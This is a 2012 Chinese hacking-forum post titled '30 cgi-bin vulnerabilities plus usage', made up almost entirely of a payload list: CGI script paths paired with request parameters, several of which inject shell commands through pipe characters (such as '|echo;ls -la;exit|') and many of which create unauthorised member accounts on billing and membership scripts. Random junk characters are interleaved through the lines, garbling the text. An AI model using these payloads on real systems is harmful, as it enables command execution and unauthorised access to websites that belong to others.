找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2417|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
==============================
# n6 w3 O& X  P- h$ O3 ?2 z9 c1 `( D2 j1 {% Y
/smspass.pl
% r! Q( m$ A2 Q3 W. Zusername=username&password=password) F( T6 T) m' ?% a  K7 M! V
% A$ @" D# M- B* A/ {2 C5 a
/index.cgi6 R( n, [7 ?3 y8 G* ^* F& `/ f
wei=ren&gen=command
6 D1 l- ], M1 F6 X9 D! |7 }+ Z& P$ n& }1 V2 ^1 e, l, @
/passmaster.cgi0 _, z  d* l% S9 z. v: }
Action=Add&Username=Username&Password=Password
  T/ r, D0 L8 {8 f) Q1 K  n, ]" d" o. B  L( e
/accountcreate.cgi/ h2 b$ ?8 e4 u
username=username&password=password&ref1=|echo;ls|
, [; G, D, {; y$ u  ]% ?" U3 x" W: x8 D% v  {
/form.cgi
1 j+ o6 j4 ]& Y" a; d7 r% C% Kname=xxxx&email=email&subject=xxxx&response=|echo;ls|
0 n/ Z8 K4 T4 t/ B$ i# f2 {, n3 j1 z
/addusr.pl8 z$ y/ j* j$ o2 q( `; R
/cgi-bin/EuroDebit/addusr.pl
: n3 d3 o! M- e: }: ouser=username&pass=Password&confirm=Password
! e! m& s/ @6 H4 I% i6 x& |# m4 M) p6 G- S/ a' c% w& M
/ccbill-local.asp
+ k/ N# v' O* e- ~8 Ipost_values=username:password
9 X" T) `- m- c9 ~
; w" z2 J$ o: w% w/count.cgi
/ Y$ K6 u/ [. i" {4 Spinfile=|echo;ls -la;exit|
4 X# O0 Z0 C0 C9 P8 I  O$ y. O4 ]( P, l4 b
/recon.cgi9 \8 R& l; b0 Q+ \
/recon.cgi?search
& }/ n; t" `" Y. L7 W) ~searchoption=1&searchfor=|echo;ls -al;exit|
) R5 [5 W$ j& q# e1 w/ {
  k8 Z9 ?# W# F3 V/verotelrum.pl
, v& K- Q2 ]0 svercode=username:password:dseegsow:add:amount<&30>
- q7 [5 A0 q1 W8 i
3 Z- W# r) c4 S0 w6 M/af.cgi
+ O: ~; p9 |0 Q6 E_browser_out=|echo;ls -la;exit;|
& V4 J: T) n5 N# v3 `" Y6 h; C
' c- V5 Z# h9 G% u( i- I, q/modify.cgi
* X# I" u) G( M5 J3 M" [. p) o4 Fusername=username&password=password&expire=30
- d4 f5 Y8 L+ R. d+ ]
4 ^8 o( _- q: o7 h/openjournal.cgi% _4 A- `4 R; y% Q7 d2 o2 H, x
edit=1&ct=2&go=|echo;ls -al;exit|- W, V3 l) m; P: i8 u
' \& F' E6 F/ a2 [  s$ C6 Y
/gx9passwd.cgi' ]2 f6 g) C& F8 R+ e! [, z: x$ i
cmd=ADD&user=username&pass=password' q2 H! E* ^2 u* E2 E' g  w

2 b  c! c8 C% P/ \/probecontrol.cgi# Y+ q. i8 k/ a% P
command=enable&username=username&password=password
, T* V+ U& ]2 g  K2 F& _5 p5 j5 Z7 A! p$ U2 C% D
/recon.cgi
3 w% o7 a6 _5 o& usearchoption=3&searchfor=echo;ls -la;exit
% `& P$ e0 ]0 o! S2 E! g
& U5 z0 y  v! R! E! n/htadd.pl
' O* j1 w, ~/ Rconfigfile=|echo; ls -alt; exit
9 a' d2 i9 C6 V  Q, X) J$ I- R5 q9 N6 `
/gx9passwd.cgi/ R1 `. p) m) b2 \- h* E6 V- g. q6 H
cmd=ADD&user=username&pass=password# Y9 \: m/ v+ z$ D1 b& J7 \9 ^8 c

1 @# T! v# G0 {0 P' x/ibill*.pl4 R4 X! C% p9 y$ z# M! I: D; c
reqtype=add&authpwd=authpwd&username=username&password=password
0 Y$ D6 Y- h, ?. ]4 H+ U9 Q, q6 E6 I! j2 r: ^5 m) v( g
/cpay.cgi* W7 [4 J3 I. r3 @; g0 Q4 A0 b- L
command=add_member&username=username(EMAIL)&password=password(DES)
# l4 _6 t+ C# @5 K% R0 {
- E! H/ \: _0 |( `/globill_ut.cgi7 H3 h9 S3 F4 g8 b7 c) D: q
do=add&username=username&password=password&wpassword=password$ X9 c1 _% s1 y+ m8 p
0 e8 w- }0 i0 _% Y& H% U
/usercontrol.cgi
# L7 R' }2 i& B: B4 v+ e) S: W, Tcommand=enable&username=USER&password=PASS( c6 w2 ?: J- x; |. O9 ^5 }$ W
- S. U6 |' x8 x4 b
/globoSALErum.cgi
! W; t3 j5 u. i5 v" P6 ]; p6 Haction=ADD&seccode=seccode&login=username&password=password0 e! l0 v3 Z- h, d6 G4 {
6 O# }. `" i- L8 H5 I
/addusr.pl
- @3 N8 n: |& @! K  Q1 z0 Uuser=USER&pass=PASS&confirm=PASS
# b; \+ p" {6 n, u' ^" e- T0 E9 P6 ^( k
/pincount.cgi
; |8 K& U" e* v8 b6 o! n, [) H/cgi-bin/mastergate/pincount.cgi! C& K  g3 p1 a" |
pinfile=|echo;pwd;exit|
6 W6 s: |6 ?, }8 W9 O5 u9 M$ F0 O& J4 G* r- y/ }% S
/accountcreate.cgi$ p0 j1 a! j' U* x9 `
/cgi-bin/gateway/accountcreate.cgi
- ?. o2 ]; G/ h7 s0 t* P0 D2 S* M" Wusername=username&password=password&password2=password&ref1=|echo;ls -al;exit3 ~% |4 O" l4 R+ d- T2 C/ J) @

: A) r, U. W; `$ t  [. P( u/af.cgi
, e  a# U0 D! H  ^. A/env.cgi& W, F9 I9 q2 r$ _8 }) v+ _2 d
ADD+;echo;pwd;exit
5 z  j8 s0 r' \2 R. f9 b) X, }  Q4 g+ |) y, Q+ [, ?
/count.cgi
" \4 C" v1 N) E8 y8 npinfile=|echo;pwd;exit|9 b( D4 _7 w% q- ]3 D: j
6 D4 I* L2 S0 O; v" t- v
/recon.cgi
& A5 e) _/ d) C5 C1 Ysearchoption=1&searchfor=|echo;ls%20-al;exit|
  G2 E0 k( Q- [+ {  |: y
& `; ?2 t7 b; Y) c/add.cgi
$ [. w4 y. @. ^0 @, Z( n0 Kusername=username&password=password&expire=30
* Y) u3 b" ~1 Y: z
. a0 c0 Z# a  E$ K, e* e+ g; a==============================
) _: @& z* m8 v; k* l  }6 E
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表